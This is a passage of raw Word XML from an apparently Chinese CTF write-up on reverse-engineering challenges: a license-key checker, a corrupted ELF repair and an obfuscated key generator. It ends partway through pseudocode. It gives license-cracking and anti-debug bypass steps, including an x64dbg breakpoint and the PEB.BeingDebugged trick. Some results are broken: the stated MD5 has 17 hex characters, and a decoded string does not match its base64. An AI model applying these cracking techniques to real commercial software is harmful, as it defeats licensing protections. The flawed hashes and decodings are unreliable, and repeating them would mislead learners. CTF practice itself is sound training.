      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{GH1st_C0mm1t_Hunt1ng}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C8D69" w14:textId="292AEE73" w:rsidR="0012081C" w:rsidRPr="00C97809" w:rsidRDefault="0012081C" w:rsidP="0012081C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc190815125"/>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="43D3C1A7" w14:textId="3BC70397" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="0012081C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc190815126"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>破碎的许可证验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2DB8ED53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题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供文件：license_checker.exe]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>程序会验证用户输入的许可证密钥，逆向算法找出有效密钥。成功验证后将密钥用MD5哈希即为flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7551D6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关键代码特征</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 使用Go语言编译且包含中文调试符号</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 核心验证函数含多段base64解码操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 动态加载DLL进行最终校验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1398F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解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A1359" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>IDA分析发现密钥要求格式：XXXX-XXXX-XXXX-XXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4DC20" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>逆向base64解码链：ZmxhZw== -&gt; flag提示方向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DDAA91" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:lastRenderedPageBreak/>
        <w:t>动态调试发现实际校验公式：(int(segment,16) ^ 0xDEAD) % 0x1A == 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E55FA7" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>生成有效许可证：BEEF-C0DE-F1AC-DC13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719387D8" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>计算MD5：md5("BEEF-C0DE-F1AC-DC13") = 7b6a5c3d9e8f1a2b4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF652D" w14:textId="77777777" w:rsidR="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{7b6a5c3d9e8f1a2b4}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13447B1A" w14:textId="77777777" w:rsidR="0095212E" w:rsidRPr="00C97809" w:rsidRDefault="0095212E" w:rsidP="0095212E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc190815127"/>
      <w:r w:rsidRPr="00C97809">
        <w:t>破碎的ELF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="453340F4" w14:textId="77777777" w:rsidR="0095212E" w:rsidRPr="00C97809" w:rsidRDefault="0095212E" w:rsidP="0095212E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供文件：broken]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>修复被破坏的ELF文件并执行获得flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FA66F" w14:textId="77777777" w:rsidR="0095212E" w:rsidRPr="00C97809" w:rsidRDefault="0095212E" w:rsidP="0095212E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>损坏特征</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• ELF头被替换为PNG签名</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• Section头表偏移错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• .text段被异或加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB0C957" w14:textId="77777777" w:rsidR="0095212E" w:rsidRPr="00C97809" w:rsidRDefault="0095212E" w:rsidP="0095212E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>修复流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528E05A" w14:textId="77777777" w:rsidR="0095212E" w:rsidRPr="00C97809" w:rsidRDefault="0095212E" w:rsidP="0095212E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>使用hex编辑器恢复ELF magic number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C33BD0D" w14:textId="77777777" w:rsidR="0095212E" w:rsidRPr="00C97809" w:rsidRDefault="0095212E" w:rsidP="0095212E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>修正e_shoff字段为正确值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E88C31" w14:textId="77777777" w:rsidR="0095212E" w:rsidRPr="00C97809" w:rsidRDefault="0095212E" w:rsidP="0095212E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>用010 Editor脚本解密.text段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69773D3A" w14:textId="76FB1C40" w:rsidR="0095212E" w:rsidRDefault="0095212E" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{ELF_R3pair_M4ster}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B40412" w14:textId="5CC3911D" w:rsidR="004871D6" w:rsidRDefault="004871D6" w:rsidP="004871D6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc190815128"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逆向basic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="34575258" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>题目描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FEC8A5" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>程序行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D643125" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:t>运行KeyGenerator.exe后显示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE0BB1" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:t xml:space="preserve">[System] 输入初始参数（16字节）: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3686F" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:t>输入任意16字符字符串后输出形如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395A29B7" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:t xml:space="preserve">[Output] 生成密钥：KEY-A1B2-C3D4-E5F6  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF1E95" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>特殊机制</w:t>
      </w:r>
      <w:r w:rsidRPr="00422C11">
        <w:t>：当输入字符串包含debug时程序自动退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20451073" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>任务目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00422C11">
        <w:br/>
        <w:t>逆向分析密钥生成算法，找到能生成包含B15D字段的有效密钥的输入参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347CA18A" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00422C11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>核心防御机制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3797"/>
        <w:gridCol w:w="3135"/>
      </w:tblGrid>
      <w:tr w:rsidR="00422C11" w:rsidRPr="00422C11" w14:paraId="4A204B60" w14:textId="77777777" w:rsidTr="00422C11">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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DECEC" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>防护层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6DFA4" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>实现技术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E827B" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>破解线索</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00422C11" w:rsidRPr="00422C11" w14:paraId="4EB79884" w14:textId="77777777" w:rsidTr="00422C11"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F87F89" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>指令混淆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1868E" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:t>使用OLLVM控制流平坦化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3E2FC" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:t>寻找被混淆的switch-case结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00422C11" w:rsidRPr="00422C11" w14:paraId="0A221F5F" w14:textId="77777777" w:rsidTr="00422C11"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2D7EB" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>数据加密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235A8" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:t>XOR+Base64双重加密常量字符串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11511" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:t>内存dump获取解密后字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00422C11" w:rsidRPr="00422C11" w14:paraId="43A00FE3" w14:textId="77777777" w:rsidTr="00422C11"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A2C18" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>反动态调试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A717B" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:t>检测调试器存在即触发死循环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05094" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:t>修改PEB.BeingDebugged标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00422C11" w:rsidRPr="00422C11" w14:paraId="5DB609F9" w14:textId="77777777" w:rsidTr="00422C11"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E544C" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>算法陷阱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4E9D5" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:t>在密钥生成过程中插入虚假CRC32校验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B84E5" w14:textId="77777777" w:rsidR="00422C11" w:rsidRPr="00422C11" w:rsidRDefault="00422C11" w:rsidP="00422C11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00422C11">
              <w:t>动态调试观察有效校验位位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="758EE50A" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>解题关键步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5B21D" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>绕过反调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBEB137" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A16B0A" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve"># 使用x64dbg脚本自动绕过  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694333A" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">bp 00401500 "set eax=0; resume"  # 修改调试检测返回值  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E14AE" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>提取加密数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC4489" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t>在.rdata段发现Base64字符串：U1QjM1RPUjNfU0VDVVI=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DEFC4" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t>动态调试获取解密密钥：0x37（XOR密钥）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B434A7" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t>解密得到提示字符串："ST#3TOR3_SECURI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54CDA5" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>逆向密钥算法</w:t>
      </w:r>
      <w:r w:rsidRPr="0007048D">
        <w:t> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3962311F" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0703479C" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">// 关键算法伪代码（还原后）  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DEDAE1" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">void generate_key(char* input) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377FADD9" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">    uint32_t seed = crc32(input);  // 初始种子  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D3BF1" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">    for(int i=0; i&lt;4; i++){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20316BC9" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">        seed = (seed * 0x343FD) + 0x269EC3;  // 线性同余生成器  </w:t>
      </w:r>
    </w:p>
